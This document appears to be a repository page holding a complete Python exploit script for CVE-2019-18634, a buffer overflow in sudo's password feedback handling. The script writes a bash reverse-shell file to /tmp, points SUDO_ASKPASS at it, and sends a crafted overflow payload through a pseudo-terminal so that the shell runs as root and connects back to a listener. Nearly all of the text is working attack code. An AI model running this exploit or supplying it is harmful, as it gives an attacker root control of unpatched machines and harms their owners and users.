-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2019-18634.py
83 lines (62 loc) · 1.65 KB
/
CVE-2019-18634.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/env python2
import sys,os
from pwn import *
TARGET=os.path.realpath("/usr/bin/sudo")
def setFlags(flags):
tgetpassFlags = {
"TGP_NOECHO":0x00,
"TGP_ECHO":0x01,
"TGP_STDIN":0x02,
"TGP_ASKPASS":0x04,
"TGP_MASK":0x08,
"TGP_NOECHO_TRY":0x10
}
flags = flags.split("|")
retval = 0
for i in flags:
retval |= tgetpassFlags[i]
return retval
def getFlags(intFlag):
tgetpassFlags = {
0x00:"TGP_NOECHO",
0x01:"TGP_ECHO",
0x02:"TGP_STDIN",
0x04:"TGP_ASKPASS",
0x08:"TGP_MASK",
0x10:"TGP_NOECHO_TRY"
}
if intFlag == 0:
return tgetpassFlags[intFlag]
flag = ""
mask=1
while mask <= intFlag:
if intFlag & mask == mask:
flag += tgetpassFlags[mask] + "|"
mask <<= 1
return flag[:-1]
if __name__ == "__main__":
with open("/tmp/rs.sh", "w") as file:
file.write("""#!/bin/bash
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
""")
os.chmod("/tmp/rs.sh", 0o777)
r=listen(4444)
mfd, sfd = os.openpty()
fd = os.open(os.ttyname(sfd), os.O_RDONLY)
p = process([TARGET,"-S", "id"],env={'SUDO_ASKPASS':"/tmp/rs.sh"}, stdin=fd)
payload = "\x00\x15"*548
payload += p64(setFlags("TGP_STDIN|TGP_ASKPASS"))
payload += "\x00\x15"*(20)
pid = p.pid
ppid = util.proc.parent(pid)
payload += p32(pid)
payload += p32(ppid)
payload += p32(pid)
payload += p32(pid)
payload += p32(pid)
payload += "\x00"*3
payload += "\n"
os.write(mfd, payload)
r.wait_for_connection()
r.interactive()
sys.exit(0)